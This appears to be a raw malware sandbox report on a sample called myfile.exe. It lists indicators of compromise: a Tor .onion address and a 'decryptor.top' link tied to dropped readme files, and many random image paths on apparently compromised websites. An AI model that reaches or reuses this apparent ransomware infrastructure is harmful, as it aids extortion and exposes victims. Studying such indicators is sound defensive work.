Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.maxcube24.com.ua/wp-json/>; rel="https://api.w.org/"Set-Cookie: PHPSESSID=q0okjhjaa24blp8vp04qd91mr0; path=/Set-Cookie: qtrans_front_language=ru; expires=Tue, 09-Sep-2025 10:07:41 GMT; path=/x-ray: wnp48936:0.740/wn48936:0.750/wa48936:D=744868
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeVary: Accept-Encoding
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueLink: <https://www.mieleshopping.it/wp-json/>; rel="https://api.w.org/"X-Httpd: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Sep 2024 10:07:49 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://holocine.de/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=31556926Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.bundan.com/wp-json/>; rel="https://api.w.org/"X-Httpd: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 09 Sep 2024 10:07:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.hostaletdelsindians.es/wp-json/>; rel="https://api.w.org/"Set-Cookie: zqwa_uQECbpt=7mTe2o%2A_SgNr; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secureSet-Cookie: wXaScyxWbh=0%5B%2AH5P1SW; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secureVary: Accept-EncodingServer-Optimized-By: La Tecla
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAge: 0Content-Type: text/html;charset=utf-8Date: Mon, 09 Sep 2024 10:08:00 GMTEtag: W/"f874205c86e2e2d9f4f9b0288f247fda"Expires: Thu, 01 Jan 1970 00:00:00 GMTServer: SquarespaceSet-Cookie: crumb=Bb/l+1uJErrZNDQ5YjJkNTNmYWQ1MmIwMTQzNzY3NGE2ODAxZDk2;Secure;Path=/Strict-Transport-Security: max-age=0Vary: Accept-EncodingX-Content-Type-Options: nosniffX-Contextid: erdXcnZq/387pIfGCConnection: closeTransfer-Encoding: chunked

Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.dr	String found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://decryptor.top/
Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, g165067x37-readme.txt37.0.dr, g165067x37-readme.txt16.0.dr, g165067x37-readme.txt29.0.dr, g165067x37-readme.txt4.0.dr, g165067x37-readme.txt56.0.dr, g165067x37-readme.txt23.0.dr, g165067x37-readme.txt61.0.dr, g165067x37-readme.txt45.0.dr, g165067x37-readme.txt62.0.dr, g165067x37-readme.txt32.0.dr	String found in binary or memory: http://decryptor.top/1A63B2FBDC010061
Source: myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24B
Source: myfile.exe, 00000000.00000003.2468286003.0000000001039000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://m2graph.fr
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://m2graph.fr/F
Source: myfile.exe, 00000000.00000003.2589450602.0000000005B15000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589450602.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://opengraphprotocol.org/schema/
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://opensource.org/licenses/MIT
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://stayblue.basecom.eu
Source: myfile.exe, 00000000.00000003.2354771647.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://90nguyentuan.com/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://90nguyentuan.com/wp-content/pics/rbfaqbvnxelf.jpg
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://90nguyentuan.com:443/wp-content/pics/rbfaqbvnxelf.jpgource0
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://9adac216.rocketcdn.me
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/1000x1000/b285b1caef/social-share-default.png
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/173x191/46f511e89b/frame-8707.png
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/173x191/e1180c19ea/frame-8707-4.png
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/173x191/ff8a0137ac/frame-8707-3.png
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/174x174/6a375a03d8/become-a-member-new.png
Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/1868x906/f75d4e9a79/kids-jumping.png/m/);display:none;
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/1920x2746/013c53af19/truegrit_full_light.jpg
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/1920x2746/71a2ff4150/truegrit_full_purple.jpg);background-position:
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/2000x1334/496b6b2333/121622_altitude_kathytran_img_3948.jpeg
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/2000x1334/db83d01729/121622_altitude_kathytran_img_2698.jpg
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/2880x1418/6a7e0f8ef0/altitude-230615-mk-home-page-image-edit.png
Source: myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/4000x1677/e2752eb3be/121622_altitude_kathytran_img_0967_extended.jp
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/428x668/95a47a6a61/updatedmobilehero.jpg
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/538x872/c3b5d925b9/attraction-basket-ball.png
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/538x872/e2831bc945/attraction-dodge-ball.png
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/538x872/eb9c0d6ee6/attraction-main-court.png
Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/628x412/deb6e6f16f/121622_altitude_kathytran_img_2328-1.png/m/
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.storyblok.com/f/201186/910x935/661205b117/little-girl-jumping-in-air-purple.png
Source: myfile.exe, 00000000.00000003.2839035490.0000000005B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abulanov.c
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abulanov.com:443/news/temp/md.pngmtpqdcchulbw.jpgfault
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activeterroristwarningcompany.com:443/news/pics/dpgo.gifyc.jpgbudsrejserallinclusive.dk/uplo
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gif
Source: myfile.exe, 00000000.00000003.2503677440.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600404554.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://afbudsrejserallinclusive.dk/uploads/assets/xwncifkynx.gifHk
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://afbudsrejserallinclusive.dk:443/uploads/assets/xwncifkynx.gifage
Source: myfile.exe, 00000000.00000002.2895379820.0000000005B3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://almamidwifery.com/
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://almamidwifery.com/content/assets/jlbaveucagau.png
Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://almamidwifery.com/content/assets/jlbaveucagau.pngjpgZ
Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://almamidwifery.com:443/content/assets/jlbaveucagau.pngurce0
Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altitudeboise.com:443/content/temp/pg.jpgesources
Source: myfile.exe, 00000000.00000003.2503575660.0000000005B27000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altitudefranchise.com/
Source: myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altitudetrampolinepark.com:443/ixizcyhfz.jpgrces
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com/0
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com/O
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com/Q
Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com/news/tmp/ohnnewfmmc.png
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com/z
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amelielecompte.wordpress.com:443/news/tmp/ohnnewfmmc.pngmagrinya.netmagrinya.net
Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://animate.style/
Source: myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avisioninthedesert.com/
Source: myfile.exe, 00000000.00000003.2468286003.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382703447.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avisioninthedesert.com/wp-content/graphic/lgul.jpg
Source: myfile.exe, 00000000.00000003.2354497266.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354771647.0000000001059000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365282654.0000000001058000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avisioninthedesert.com/~
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bayshoreelite.com/
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bayshoreelite.com/comments/feed/
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bayshoreelite.com/data/game/mfkyhvlfokmitv.png
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bayshoreelite.com/feed/
Source: myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd2fly.com:443/static/game/nkfydhwjjfbipa.jpgicgx.jpgurce0
Source: myfile.exe, 00000000.00000003.2839035490.0000000005B33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bundan.com/wp-co
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bundan.com/wp-content/temp/wkeqlpss.png
Source: myfile.exe, 00000000.00000003.2468286003.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/news/graphic/yooacevq.jpg
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/images/favicon.png
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/plain_text/style.css?v=4
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-content/plugins/under-construction-page/themes/plain_text/ucp-cog.png
Source: myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://business-basic.de/wp-login.php
Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
Source: myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chainofhopeeurope.eu/(
Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chainofhopeeurope.eu/?
Source: myfile.exe, 00000000.00000003.2600404554.000000000103E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589691593.000000000103D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chainofhopeeurope.eu/data/graphic/tcafyhpt.jpg
Source: myfile.exe, 00000000.00000003.2556494998.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chainofhopeeurope.eu/data/graphic/tcafyhpt.jpg6
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chainofhopeeurope.eu:443/data/graphic/tcafyhpt.jpgesource0
Source: myfile.exe, 00000000.00000003.2589691593.0000000001071000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net/
Source: myfile.exe, 00000000.00000003.2589691593.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net/i
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net/png
Source: myfile.exe, 00000000.00000003.2600387673.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net/wp-content/temp/vudowd.png
Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net/wp-content/temp/vudowd.pnggD
Source: myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chomiksy.net:443/wp-content/temp/vudowd.png811-000d3aa4692b
Source: myfile.exe, 00000000.00000003.2839610274.0000000005B25000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cs.iubenda.com/autoblocking/3544219.js
Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/
Source: myfile.exe, 00000000.00000003.2839610274.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/content/tmp/xp.jpg
Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://davedavisphotos.com/content/tmp/xp.jpggD
